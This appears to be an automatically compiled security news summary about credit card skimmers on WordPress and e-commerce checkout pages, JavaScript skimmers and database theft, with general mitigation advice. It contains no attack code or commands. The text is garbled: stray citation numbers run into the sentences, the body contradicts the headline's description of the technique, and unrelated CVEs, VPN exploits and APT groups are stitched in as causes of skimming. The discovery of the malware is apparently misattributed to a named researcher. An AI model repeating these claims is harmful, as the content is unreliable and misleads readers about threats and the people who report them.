WordPress Skimmers Evade Detection by Injecting Themselves into Database Tables

WordPress Credit Card Skimmer Malware

A recent and significant threat in the cybersecurity landscape is the emergence of a new breed of credit card skimming malware targeting WordPress checkout pages.

• Malware Details: This malware has been identified by Natalie Silvanovich, a security researcher at Google’s Project Zero team. It is designed to intercept and steal credit card information from WordPress checkout pages, exploiting vulnerabilities in the e-commerce platforms15.
• Impact: The malware can capture sensitive financial information, including credit card numbers, expiration dates, and CVV codes, posing a severe risk to online shoppers and e-commerce businesses.
• Mitigation: To protect against this malware, website administrators are advised to update their WordPress plugins and themes to the latest versions, implement robust security measures such as Web Application Firewalls (WAFs), and regularly monitor their websites for suspicious activity.

E-commerce JavaScript Infections

E-commerce platforms are increasingly being targeted by JavaScript-based malware, which can lead to various types of infections and data theft.

• JavaScript Skimmers: These malware variants inject malicious JavaScript code into the checkout pages of e-commerce websites. This code can skim credit card details and other sensitive information, often without the knowledge of the website owners or users15.
• Exploitation Methods: The attackers often exploit vulnerabilities in third-party libraries or plugins used by the e-commerce platforms. Phishing campaigns and compromised developer accounts can also be used to inject the malicious code.
• Examples: Recent reports have highlighted the use of YouTube URLs combined with phishing tactics to distribute malware, further complicating the security landscape for e-commerce sites1.

Database Table Skimming Techniques

Database table skimming involves the theft of sensitive data directly from the databases of e-commerce platforms.

• Techniques: Attackers may use SQL injection vulnerabilities or exploit weak database credentials to gain access to the database tables. Once inside, they can extract sensitive information such as credit card numbers, customer details, and other valuable data45.
• Vulnerabilities: Critical vulnerabilities like those identified in Aviatrix Controller (CVE-2024-50603) and GFI KerioControl firewalls (CVE-2024-52875) can provide entry points for attackers to access and skim database tables14.
• Mitigation: Ensuring that databases are properly secured with strong passwords, regular updates, and robust access controls is crucial. Implementing Web Application Firewalls (WAFs) and conducting regular security audits can also help in preventing such attacks.

Additional Considerations

• Zero-Day Exploits: The recent exploitation of a zero-day vulnerability in Ivanti Connect Secure VPN by Chinese hackers highlights the urgency of keeping software up-to-date and patching known vulnerabilities promptly5.
• Advanced Threats: Sophisticated cyber-espionage operations, such as those conducted by the RedDelta and RedCurl APT groups, also target e-commerce platforms and databases, emphasizing the need for advanced security measures and continuous monitoring15.

In summary, the latest news indicates a heightened risk of credit card skimming malware, JavaScript infections, and database table skimming techniques targeting e-commerce platforms. Staying updated with the latest security patches, implementing robust security measures, and continuously monitoring for suspicious activities are essential to mitigate these threats.